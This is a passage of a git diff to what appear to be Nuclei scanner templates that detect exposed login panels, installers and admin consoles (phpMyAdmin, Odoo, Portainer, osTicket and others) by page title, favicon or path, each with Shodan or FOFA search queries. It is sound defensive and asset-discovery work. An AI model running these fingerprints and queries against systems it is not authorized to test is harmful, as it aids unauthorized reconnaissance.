   name: OCS Inventory Login Panel
-  author: pikpikcu
+  author: pikpikcu,ritikchaddha
   severity: info
   metadata:
+    verified: true
+    shodan-query: title:"OCS Inventory"
     fofa-query: title="OCS Inventory"
   tags: ocs-inventory,panel
 
@@ -12,7 +14,9 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}"
+      - "{{BaseURL}}/ocsreports"
 
+    stop-at-first-match: true
     redirects: true
     max-redirects: 2
     matchers-condition: and
@@ -20,7 +24,7 @@ requests:
       - type: word
         part: body
         words:
-          - '<title>OCS Inventory</title>'
+          - '<title>OCS Inventory'
 
       - type: status
         status:
diff --git a/exposed-panels/odoo-database-manager.yaml b/exposed-panels/odoo-database-manager.yaml
index 3031253bbe..230f9883f7 100644
--- a/exposed-panels/odoo-database-manager.yaml
+++ b/exposed-panels/odoo-database-manager.yaml
@@ -1,9 +1,10 @@
 id: odoo-database-manager
 
 info:
-  name: Odoo-Database-Manager
+  name: Odoo - Database Manager Discovery
   author: __Fazal,R3dg33k
   severity: high
+  description: Odoo database manager was discovered.
   tags: panel,odoo
 
 requests:
@@ -21,3 +22,5 @@ requests:
           - "<title>Odoo</title>"
           - "{ action: 'database_manager' }"
         condition: and
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposed-panels/officekeeper-admin-login.yaml b/exposed-panels/officekeeper-admin-login.yaml
new file mode 100644
index 0000000000..01afb6105c
--- /dev/null
+++ b/exposed-panels/officekeeper-admin-login.yaml
@@ -0,0 +1,23 @@
+id: officekeeper-admin-login
+
+info:
+  name: OfficeKeeper - Admin Login Panel
+  author: gy741
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-800060828
+  tags: officekeeper,dlp,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/login"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "통합PC보안이 가능한 정보유출방지 솔루션"
diff --git a/exposed-panels/oki-data.yaml b/exposed-panels/oki-data.yaml
index 9b56bac893..9e5b07e052 100644
--- a/exposed-panels/oki-data.yaml
+++ b/exposed-panels/oki-data.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/5937
-  tags: panel,oki
+  tags: panel,oki,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/okiko-sfiler-portal.yaml b/exposed-panels/okiko-sfiler-portal.yaml
index 966dae495b..b74089478f 100644
--- a/exposed-panels/okiko-sfiler-portal.yaml
+++ b/exposed-panels/okiko-sfiler-portal.yaml
@@ -4,8 +4,8 @@ info:
   name: OKIKO S-Filer Portal Detect
   author: johnk3r
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=sfiler
+  metadata:
+    shodan-query: http.title:"S-Filer"
   tags: okiko,panel
 
 requests:
diff --git a/exposed-panels/okta-panel.yaml b/exposed-panels/okta-panel.yaml
index c0ece3bfef..7ce9025760 100644
--- a/exposed-panels/okta-panel.yaml
+++ b/exposed-panels/okta-panel.yaml
@@ -4,8 +4,8 @@ info:
   name: Okta Login Panel
   author: pussycat0x
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22okta%22
+  metadata:
+    shodan-query: http.title:"okta"
   tags: panel,okta,login
 
 requests:
diff --git a/exposed-panels/olt-web-interface.yaml b/exposed-panels/olt-web-interface.yaml
new file mode 100644
index 0000000000..00d15874d4
--- /dev/null
+++ b/exposed-panels/olt-web-interface.yaml
@@ -0,0 +1,32 @@
+id: olt-web-interface
+
+info:
+  name: OLT Web Management Interface
+  author: DhiyaneshDk
+  severity: info
+  reference:
+    - https://www.exploit-db.com/ghdb/8020
+  metadata:
+    verified: true
+    shodan-query: title:"OLT Web Management Interface"
+  tags: edb,panel,olt
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/action/login.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "OLT Web Management Interface"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/omniampx-panel.yaml b/exposed-panels/omniampx-panel.yaml
new file mode 100644
index 0000000000..eb62a1fd54
--- /dev/null
+++ b/exposed-panels/omniampx-panel.yaml
@@ -0,0 +1,25 @@
+id: omniampx-panel
+
+info:
+  name: Omnia Node MPX - Panel
+  author: arafatansari
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Omnia MPX"
+  tags: panel,omnia,omniampx
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Omnia MPX Node | Login"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/open-game-panel.yaml b/exposed-panels/open-game-panel.yaml
index b865ed26f8..3b16acaf75 100644
--- a/exposed-panels/open-game-panel.yaml
+++ b/exposed-panels/open-game-panel.yaml
@@ -8,7 +8,7 @@ info:
     - https://www.exploit-db.com/ghdb/7418
   metadata:
     shodan-query: http.title:"Open Game Panel"
-  tags: panel
+  tags: panel,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/open-stack-dashboard-login.yaml b/exposed-panels/open-stack-dashboard-login.yaml
index 9b7c6bd674..d67fa9a487 100644
--- a/exposed-panels/open-stack-dashboard-login.yaml
+++ b/exposed-panels/open-stack-dashboard-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6464
-  tags: panel,openstack
+  tags: panel,openstack,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/open-virtualization-manager-panel.yaml b/exposed-panels/open-virtualization-manager-panel.yaml
index cc81a65f2c..3860db4d63 100644
--- a/exposed-panels/open-virtualization-manager-panel.yaml
+++ b/exposed-panels/open-virtualization-manager-panel.yaml
@@ -4,15 +4,13 @@ info:
   name: Open Virtualization Userportal & Webadmin Panel Detection
   author: idealphase
   severity: info
-  description: Open Virtualization Userportal & Webadmin panels were detected. Open Virtualization Manager is an open-source distributed virtualization solution designed to manage enterprise infrastructure. oVirt
-    uses the trusted KVM hypervisor and is built upon several other community projects, including libvirt, Gluster, PatternFly, and Ansible.
+  description: Open Virtualization Userportal & Webadmin panels were detected. Open Virtualization Manager is an open-source distributed virtualization solution designed to manage enterprise infrastructure. oVirt uses the trusted KVM hypervisor and is built upon several other community projects, including libvirt, Gluster, PatternFly, and Ansible.
   reference:
     - https://www.ovirt.org/
     - https://www.ovirt.org/dropped/admin-guide/virt/console-client-resources.html
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
-    cvss-score: 5.3
-    cwe-id: CWE-200
+    cvss-score: 0.0
+    cwe-id: CWE-668
   metadata:
     shodan-query: title:"Ovirt-Engine"
     google-query: intitle:"Ovirt-Engine"
diff --git a/exposed-panels/openemr-detect.yaml b/exposed-panels/openemr-detect.yaml
index 8d4edd872c..5eeb4a5fd2 100644
--- a/exposed-panels/openemr-detect.yaml
+++ b/exposed-panels/openemr-detect.yaml
@@ -1,26 +1,26 @@
-id: openemr-detect
-
-info:
-  name: OpenEMR Product Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-query: app="OpenEMR"
-    shodan-query: http.html:"OpenEMR"
-  tags: panel,openemr
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/interface/login/login.php?site=default"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"title":"OpenEMR Product Registration"'
-
-      - type: status
-        status:
-          - 200
+id: openemr-detect
+
+info:
+  name: OpenEMR Product Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-query: app="OpenEMR"
+    shodan-query: http.html:"OpenEMR"
+  tags: panel,openemr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/interface/login/login.php?site=default"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"title":"OpenEMR Product Registration"'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/opennms-web-console.yaml b/exposed-panels/opennms-web-console.yaml
index 6fb6dbebb8..ac308ba02b 100644
--- a/exposed-panels/opennms-web-console.yaml
+++ b/exposed-panels/opennms-web-console.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/5468
-  tags: panel,login
+  tags: panel,login,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/openvz-web-login.yaml b/exposed-panels/openvz-web-login.yaml
new file mode 100644
index 0000000000..e36397b63c
--- /dev/null
+++ b/exposed-panels/openvz-web-login.yaml
@@ -0,0 +1,26 @@
+id: openvz-web-login
+
+info:
+  name: Openvz Web Panel Login
+  author: nullfuzz
+  severity: info
+  description: |
+    OpenVZ Web Panel is a GUI web-based frontend for controlling of the physical and virtual servers with the OpenVZ virtualization technology.
+  reference:
+    - https://github.com/sibprogrammer/owp
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-1898583197
+  tags: panel,openvz
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "Login - OpenVZ Web Panel")'
+        condition: and
diff --git a/exposed-panels/openwrt-login.yaml b/exposed-panels/openwrt-login.yaml
index 0d5be7ea33..b93fce357f 100644
--- a/exposed-panels/openwrt-login.yaml
+++ b/exposed-panels/openwrt-login.yaml
@@ -1,20 +1,23 @@
 id: openwrt-login
 
 info:
-  name: Opentwrt Login Detect
-  author: For3stCo1d
+  name: Opentwrt Login / Configuration Interface
+  author: For3stCo1d,TechbrunchFR
   severity: info
   reference:
     - https://openwrt.org
+    - https://github.com/openwrt/luci
   metadata:
     shodan-query: http.title:"OpenWrt - LuCI"
-  tags: openwrt,default-login,router
+  tags: openwrt,router
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}"
+      - "{{BaseURL}}/cgi-bin/luci/"
 
+    stop-at-first-match: true
     redirects: true
     max-redirects: 2
     matchers:
@@ -22,6 +25,8 @@ requests:
         part: body
         words:
           - '<title>OpenWrt'
+          - "Powered by LuCI"
+        condition: or
 
     extractors:
       - type: regex
diff --git a/exposed-panels/oracle-business-control.yaml b/exposed-panels/oracle-business-control.yaml
index db8c05e5e4..e304203f12 100644
--- a/exposed-panels/oracle-business-control.yaml
+++ b/exposed-panels/oracle-business-control.yaml
@@ -4,8 +4,8 @@ info:
   name: Oracle Commerce Business Control Center
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Oracle+Commerce%22
+  metadata:
+    shodan-query: http.title:"Oracle Commerce"
   tags: oracle,login,panel
 
 requests:
diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml
index d31670dd83..d3a7479cb7 100644
--- a/exposed-panels/oracle-integrated-manager.yaml
+++ b/exposed-panels/oracle-integrated-manager.yaml
@@ -4,8 +4,8 @@ info:
   name: Oracle(R) Integrated Lights Out Manager
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2
+  metadata:
+    shodan-query: http.title:"Oracle(R) Integrated Lights Out Manager"
   tags: oracle,login,panel
 
 requests:
diff --git a/exposed-panels/oracle-people-enterprise.yaml b/exposed-panels/oracle-people-enterprise.yaml
index 8ec8eb95e8..90f42929ea 100644
--- a/exposed-panels/oracle-people-enterprise.yaml
+++ b/exposed-panels/oracle-people-enterprise.yaml
@@ -4,8 +4,8 @@ info:
   name: Oracle Peoplesoft Enterprise
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Oracle+Peoplesoft+Enterprise%22
+  metadata:
+    shodan-query: http.title:"Oracle Peoplesoft Enterprise"
   tags: oracle,login,panel
 
 requests:
diff --git a/exposed-panels/osticket-panel.yaml b/exposed-panels/osticket-panel.yaml
new file mode 100644
index 0000000000..4893c09e53
--- /dev/null
+++ b/exposed-panels/osticket-panel.yaml
@@ -0,0 +1,32 @@
+id: osticket-panel
+
+info:
+  name: OSTicket Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"powered by osTicket"
+  tags: panel,osticket
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/login.php"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'powered by osTicket'
+          - 'content="osTicket'
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/osticket/osticket-install.yaml b/exposed-panels/osticket/osticket-install.yaml
new file mode 100644
index 0000000000..d7c02ed402
--- /dev/null
+++ b/exposed-panels/osticket/osticket-install.yaml
@@ -0,0 +1,34 @@
+id: osticket-install
+
+info:
+  name: OSTicket Installation
+  author: ritikchaddha
+  severity: high
+  metadata:
+    verified: true
+    shodan-query: http.title:"osTicket Installer"
+  tags: panel,osticket,install
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/upload/setup/install.php"
+      - "{{BaseURL}}/setup/install.php"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>osTicket Installer'
+
+      - type: word
+        part: body
+        words:
+          - 'already installed'
+        negative: true
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/pacs-connexion-utilisateur.yaml b/exposed-panels/pacs-connexion-utilisateur.yaml
index f71e39ac2e..4f7558b184 100644
--- a/exposed-panels/pacs-connexion-utilisateur.yaml
+++ b/exposed-panels/pacs-connexion-utilisateur.yaml
@@ -4,8 +4,8 @@ info:
   name: GXD5 Pacs Connexion utilisateur
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22GXD5+Pacs+Connexion+utilisateur%22
+  metadata:
+    shodan-query: http.title:"GXD5 Pacs Connexion utilisateur"
   tags: panel,login
 
 requests:
diff --git a/exposed-panels/pandora-fms-console.yaml b/exposed-panels/pandora-fms-console.yaml
index 36eb21ecc1..6beb1676e6 100644
--- a/exposed-panels/pandora-fms-console.yaml
+++ b/exposed-panels/pandora-fms-console.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6827
-  tags: panel
+  tags: panel,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/parallels/parallels-hsphere-detect.yaml b/exposed-panels/parallels/parallels-hsphere-detect.yaml
new file mode 100644
index 0000000000..ac31366b02
--- /dev/null
+++ b/exposed-panels/parallels/parallels-hsphere-detect.yaml
@@ -0,0 +1,28 @@
+id: parallels-hsphere-detect
+
+info:
+  name: Parallels H-Sphere Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Parallels H-Sphere"
+  tags: panel,parallels,hsphere
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "<title>Parallels H-Sphere</title>"
+          - "<TITLE>H-SPHERE</TITLE>"
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/phpminiadmin-panel.yaml b/exposed-panels/phpminiadmin-panel.yaml
new file mode 100644
index 0000000000..be1fd6ccee
--- /dev/null
+++ b/exposed-panels/phpminiadmin-panel.yaml
@@ -0,0 +1,33 @@
+id: phpminiadmin-panel
+
+info:
+  name: PhpMiniAdmin Panel
+  author: nullfuzz
+  severity: info
+  description: |
+    phpMiniAdmin  is a third-party tool that you can use to manipulate MySQL databases.
+  reference:
+    - https://github.com/osalabs/phpminiadmin
+  metadata:
+    verified: true
+    shodan-query: http.html:"phpMiniAdmin"
+  tags: panel,phpminiadmin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/phpminiadmin.php"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, '<title>phpMiniAdmin')"
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'phpMiniAdmin ([0-9._]+)'
diff --git a/exposed-panels/phpmyadmin-panel.yaml b/exposed-panels/phpmyadmin-panel.yaml
index 247fb6ee34..324ec6f37d 100644
--- a/exposed-panels/phpmyadmin-panel.yaml
+++ b/exposed-panels/phpmyadmin-panel.yaml
@@ -4,13 +4,15 @@ info:
   name: phpMyAdmin Panel
   author: pdteam
   severity: info
+  metadata:
+    shodan-query: http.title:phpMyAdmin
   tags: panel,phpmyadmin
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/phpmyadmin/"
-      - "{{BaseURL}}/admin//phpmyadmin/"
+      - "{{BaseURL}}/admin/phpmyadmin/"
       - "{{BaseURL}}/_phpmyadmin/"
       - "{{BaseURL}}/administrator/components/com_joommyadmin/phpmyadmin/"
       - "{{BaseURL}}/apache-default/phpmyadmin/"
diff --git a/exposed-panels/phppgadmin-panel.yaml b/exposed-panels/phppgadmin-panel.yaml
index 1bea48fa5b..3c87526b32 100644
--- a/exposed-panels/phppgadmin-panel.yaml
+++ b/exposed-panels/phppgadmin-panel.yaml
@@ -2,26 +2,33 @@ id: phppgadmin-panel
 
 info:
   name: phpPgAdmin Panel
-  author: Ganofins
+  author: Ganofins,Nullfuzz
   severity: info
-  description: phpPgAdmin is a third-party tool that you can use to manipulate PostgreSQL databases.
+  description: |
+    phpPgAdmin is a third-party tool that you can use to manipulate PostgreSQL databases.
   reference:
     - https://docs.cpanel.net/cpanel/databases/phppgadmin/
-  classification:
-    cwe-id: CWE-200
-  remediation: Ensure proper access.
+  metadata:
+    verified: true
+    shodan-query: http.title:phpPgAdmin
   tags: panel,phppgadmin
 
 requests:
   - method: GET
     path:
+      - "{{BaseURL}}"
       - "{{BaseURL}}/phppgadmin/"
+
+    matchers-condition: or
     matchers:
-      - type: word
-        words:
-          - "phpPgAdmin"
-          - "browser.php"
-          - "intro.php"
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, 'intro.php') && contains(body, 'browser.php')"
         condition: and
 
-# Enhanced by mp on 2022/02/09
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, '<title>phpPgAdmin')"
+        condition: and
diff --git a/exposed-panels/pichome-panel.yaml b/exposed-panels/pichome-panel.yaml
new file mode 100644
index 0000000000..fc1e629a04
--- /dev/null
+++ b/exposed-panels/pichome-panel.yaml
@@ -0,0 +1,32 @@
+id: pichome-panel
+
+info:
+  name: Pichome Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:933976300
+  tags: pichome,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/user.php?mod=login"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Powered By oaooa PicHome'
+          - 'content="oaooa"'
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/plastic-scm-login.yaml b/exposed-panels/plastic-scm-login.yaml
index 28539eb5fd..088746a5ec 100644
--- a/exposed-panels/plastic-scm-login.yaml
+++ b/exposed-panels/plastic-scm-login.yaml
@@ -4,8 +4,8 @@ info:
   name: Plastic SCM Login
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Log+in+-+Plastic+SCM%22
+  metadata:
+    shodan-query: http.title:"Plastic SCM"
   tags: panel,plastic
 
 requests:
diff --git a/exposed-panels/plesk-obsidian.yaml b/exposed-panels/plesk-obsidian.yaml
index 175dcb1e3c..c7be3a2d0c 100644
--- a/exposed-panels/plesk-obsidian.yaml
+++ b/exposed-panels/plesk-obsidian.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6951
-  tags: panel,plesk
+  tags: plesk,edb,panel
 
 requests:
   - method: GET
diff --git a/exposed-panels/plesk-onyx.yaml b/exposed-panels/plesk-onyx.yaml
index 8d114df674..29e1633292 100644
--- a/exposed-panels/plesk-onyx.yaml
+++ b/exposed-panels/plesk-onyx.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6501
-  tags: panel,plesk,login
+  tags: panel,plesk,login,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/polycom-login.yaml b/exposed-panels/polycom-login.yaml
index 40b49003ee..37e6cec135 100644
--- a/exposed-panels/polycom-login.yaml
+++ b/exposed-panels/polycom-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6863
-  tags: panel
+  tags: edb,panel
 
 requests:
   - method: GET
diff --git a/exposed-panels/portainer-init-deploy.yaml b/exposed-panels/portainer-init-deploy.yaml
index 8e01787f93..bf321f2d6b 100644
--- a/exposed-panels/portainer-init-deploy.yaml
+++ b/exposed-panels/portainer-init-deploy.yaml
@@ -1,9 +1,10 @@
 id: portainer-init-deploy
 
 info:
-  name: Portainer Init Deploy
+  name: Portainer - Init Deploy Discovery
   author: princechaddha
   severity: high
+  description: Portainer initialization deployment files were discovered.
   reference:
     - https://documentation.portainer.io/v2.0/deploy/initial/
   tags: portainer,exposure,docker,devops,panel
@@ -27,3 +28,5 @@ requests:
       - type: status
         status:
           - 404
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposed-panels/powerjob-panel.yaml b/exposed-panels/powerjob-panel.yaml
new file mode 100644
index 0000000000..2cfd129e20
--- /dev/null
+++ b/exposed-panels/powerjob-panel.yaml
@@ -0,0 +1,26 @@
+id: powerjob-panel
+
+info:
+  name: PowerJob Login Panel
+  author: pikpikcu
+  severity: info
+  metadata:
+    verified: true
+    fofa-query: title="PowerJob"
+  tags: panel,powerjob
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>PowerJob</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/powerlogic-ion.yaml b/exposed-panels/powerlogic-ion.yaml
index cf1a67c63b..c17663b1c1 100644
--- a/exposed-panels/powerlogic-ion.yaml
+++ b/exposed-panels/powerlogic-ion.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://www.exploit-db.com/ghdb/6810
-  tags: panel
+  tags: panel,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/privx-panel.yaml b/exposed-panels/privx-panel.yaml
index e0c827959c..8a2e577e6f 100644
--- a/exposed-panels/privx-panel.yaml
+++ b/exposed-panels/privx-panel.yaml
@@ -22,8 +22,6 @@ requests:
         part: body
         words:
           - '<title>PrivX</title>'
-          - '<div id="app"></div>'
-        condition: or
 
       - type: status
         status:
diff --git a/exposed-panels/project-insight-login.yaml b/exposed-panels/project-insight-login.yaml
index e2a5c1795b..c6f7124ed3 100644
--- a/exposed-panels/project-insight-login.yaml
+++ b/exposed-panels/project-insight-login.yaml
@@ -8,7 +8,7 @@ info:
     - https://www.exploit-db.com/ghdb/7413
   metadata:
     shodan-query: http.title:"Project Insight - Login"
-  tags: panel
+  tags: panel,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/projectsend-login.yaml b/exposed-panels/projectsend-login.yaml
index b2b995c443..efdb12dc99 100644
--- a/exposed-panels/projectsend-login.yaml
+++ b/exposed-panels/projectsend-login.yaml
@@ -8,8 +8,8 @@ info:
     - https://www.exploit-db.com/ghdb/7380
     - https://github.com/projectsend/projectsend
   metadata:
-    google-dork: intext:Provided by ProjectSend
-  tags: panel,projectsend
+    google-query: intext:Provided by ProjectSend
+  tags: panel,projectsend,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/prometheus-pushgateway-exposed-panel.yaml b/exposed-panels/prometheus-pushgateway-exposed-panel.yaml
new file mode 100644
index 0000000000..31c8117172
--- /dev/null
+++ b/exposed-panels/prometheus-pushgateway-exposed-panel.yaml
@@ -0,0 +1,18 @@
+id: prometheus-pushgateway-exposed-panel
+
+info:
+  name: Prometheus Pushgateway exposed panel
+  author: codexlynx
+  severity: low
+  description: Exposed Prometheus Pushgateway panel
+  tags: panel,prometheus,pushgateway
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        words:
+          - '<title>Prometheus Pushgateway</title>'
diff --git a/exposed-panels/qmail-admin-login.yaml b/exposed-panels/qmail-admin-login.yaml
new file mode 100644
index 0000000000..d7617654a0
--- /dev/null
+++ b/exposed-panels/qmail-admin-login.yaml
@@ -0,0 +1,33 @@
+id: qmail-admin-login
+
+info:
+  name: QmailAdmin Login
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"QmailAdmin"
+  tags: qmail,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/qmailadmin/qmailadmin.cgi"
+      - "{{BaseURL}}/cgi-bin/qmailadmin/qmailadmin"
+      - "{{BaseURL}}/cgi-bin/qmailadmin"
+      - "{{BaseURL}}/cgi-ssl/qmailadmin/qmailadmin"
+
+    redirects: true
+    max-redirects: 2
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "QmailAdmin"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/qnap/qnap-photostation-panel.yaml b/exposed-panels/qnap/qnap-photostation-panel.yaml
new file mode 100644
index 0000000000..d014616c9a
--- /dev/null
+++ b/exposed-panels/qnap/qnap-photostation-panel.yaml
@@ -0,0 +1,31 @@
+id: qnap-photostation-panel
+
+info:
+  name: PhotoStation Panel
+  author: idealphase
+  severity: info
+  description: |
+    Centrally store, manage, and enjoy your full resolution photos across all your devices with QNAP NAS.
+  reference:
+    - https://www.qnap.com/th-th/software/photo-station
+  metadata:
+    verified: true
+    shodan-query: http.title:"Photo Station"
+  tags: panel,photostation,qnap
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/photo/"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        part: body
+        regex:
+          - '(?m)<title>(.*)Photo Station(.*)<\/title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/qnap/qnap-qts-panel.yaml b/exposed-panels/qnap/qnap-qts-panel.yaml
new file mode 100644
index 0000000000..e528828dff
--- /dev/null
+++ b/exposed-panels/qnap/qnap-qts-panel.yaml
@@ -0,0 +1,35 @@
+id: qnap-qts-panel
+
+info:
+  name: QNAP - QTS Panel Discovery
+  author: idealphase
+  severity: info
+  description: |
+    QNAP QTS Panel was discovered.
+  reference:
+    - https://www.qnap.com/en?ref=header_logo
+  metadata:
+    verified: true
+    shodan-query: product:"QNAP"
+  classification:
+    cvss-score: 0.0
+    cwe-id: CWE-200
+  tags: panel,qnap,qts
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>QNAP Turbo NAS</title>"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/exposed-panels/qualcomm-voip-router.yaml b/exposed-panels/qualcomm-voip-router.yaml
index c26b8d465d..6d8888d4b7 100644
--- a/exposed-panels/qualcomm-voip-router.yaml
+++ b/exposed-panels/qualcomm-voip-router.yaml
@@ -1,25 +1,25 @@
-id: qualcomm-voip-router
+id: qualcomm-voip-router
 
-info:
-  name: Qualcomm 4G LTE WiFi VoIP-Router
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-dork: 'app="Qualcomm-4G-LTE-WiFi-VoIP-Router"'
-  tags: panel,qualcomm,iot,router,voip
+info:
+  name: Qualcomm 4G LTE WiFi VoIP-Router
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-dork: 'app="Qualcomm-4G-LTE-WiFi-VoIP-Router"'
+  tags: panel,qualcomm,iot,router,voip
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>4G LTE WiFi VoIP Router</title>'
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>4G LTE WiFi VoIP Router</title>'
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/exposed-panels/r-webserver-login.yaml b/exposed-panels/r-webserver-login.yaml
index 993dd39a8a..e8244cb64e 100644
--- a/exposed-panels/r-webserver-login.yaml
+++ b/exposed-panels/r-webserver-login.yaml
@@ -1,23 +1,23 @@
-id: r-webserver-login
+id: r-webserver-login
 
-info:
-  name: R WebServer Login
-  author: pussycat0x
-  severity: info
-  reference: https://www.exploit-db.com/ghdb/7132
-  tags: panel,rwebserver
+info:
+  name: R WebServer Login
+  author: pussycat0x
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/7132
+  tags: panel,rwebserver
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<title>R WebServer</title>"
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>R WebServer</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/radius-manager.yaml b/exposed-panels/radius-manager.yaml
index ec613b8f78..f95a40feec 100644
